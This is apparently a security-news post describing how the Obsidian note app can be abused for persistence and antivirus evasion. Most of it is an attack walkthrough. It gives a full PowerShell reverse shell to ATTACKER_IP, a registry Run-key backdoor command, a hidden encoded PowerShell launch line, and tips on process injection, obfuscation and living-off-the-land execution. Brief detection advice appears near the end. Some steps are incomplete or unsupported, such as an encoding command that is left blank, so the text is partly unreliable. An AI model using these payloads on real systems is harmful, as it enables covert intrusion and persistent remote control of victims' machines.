Obsidian, a note-taking application, can be exploited to gain persistence on a target system while bypassing antivirus solutions like Bitdefender and padvish. This technique involves using a hidden reverse shell, potentially leveraging Beacon Object Files (BOF) for evasion.
You Should Know:
Step-by-Step Exploitation Process
1. Initial Setup
- Install Obsidian on the target machine (if not already present).
- Prepare a malicious markdown file containing embedded reverse shell code.
2. Crafting the Malicious Payload
- Use a PowerShell or Python-based reverse shell script.
- Encode the payload to evade signature-based detection.
Example PowerShell Reverse Shell (Base64 Encoded):
$client = New-Object System.Net.Sockets.TCPClient("ATTACKER_IP", PORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
– Encode with:
3. Bypassing Antivirus
- Use Process Hollowing or Process Injection to execute the payload within Obsidian’s process.
- Leverage BOF (Beacon Object Files) for in-memory execution if targeting Bitdefender.
4. Maintaining Persistence
- Modify Obsidian’s startup scripts or plugins to execute the payload on launch.
- Use Windows Registry for persistence:
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "ObsidianBackdoor" /t REG_SZ /d "C:\path\to\obsidian.exe --malicious-argument"
5. Hidden Execution
- Run the reverse shell in a hidden window:
start /B powershell -nop -w hidden -encodedcommand <BASE64_PAYLOAD>
Evasion Techniques
- Obfuscation: Use tools like Invoke-Obfuscation for PowerShell scripts.
- Living-off-the-Land (LOLBAS): Leverage legitimate binaries (e.g.,
msbuild.exe) for execution. - Time-based Execution: Delay payload execution using `timeout` or scheduled tasks.
What Undercode Say
This technique demonstrates how legitimate applications like Obsidian can be weaponized for persistence and evasion. Security teams should:
– Monitor unusual child processes spawned by note-taking apps.
– Inspect registry modifications and unsigned plugin loads.
– Use YARA rules to detect malicious markdown files.
Expected Output:
A stealthy reverse shell executing within Obsidian’s process, evading AV detection, and maintaining persistence through registry or startup scripts.
Prediction
As attackers increasingly abuse legitimate software, EDR solutions will likely enhance behavioral detection for trusted applications, focusing on anomalous process injections and script executions.
References:
Reported By: Hassan Sohrabian – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
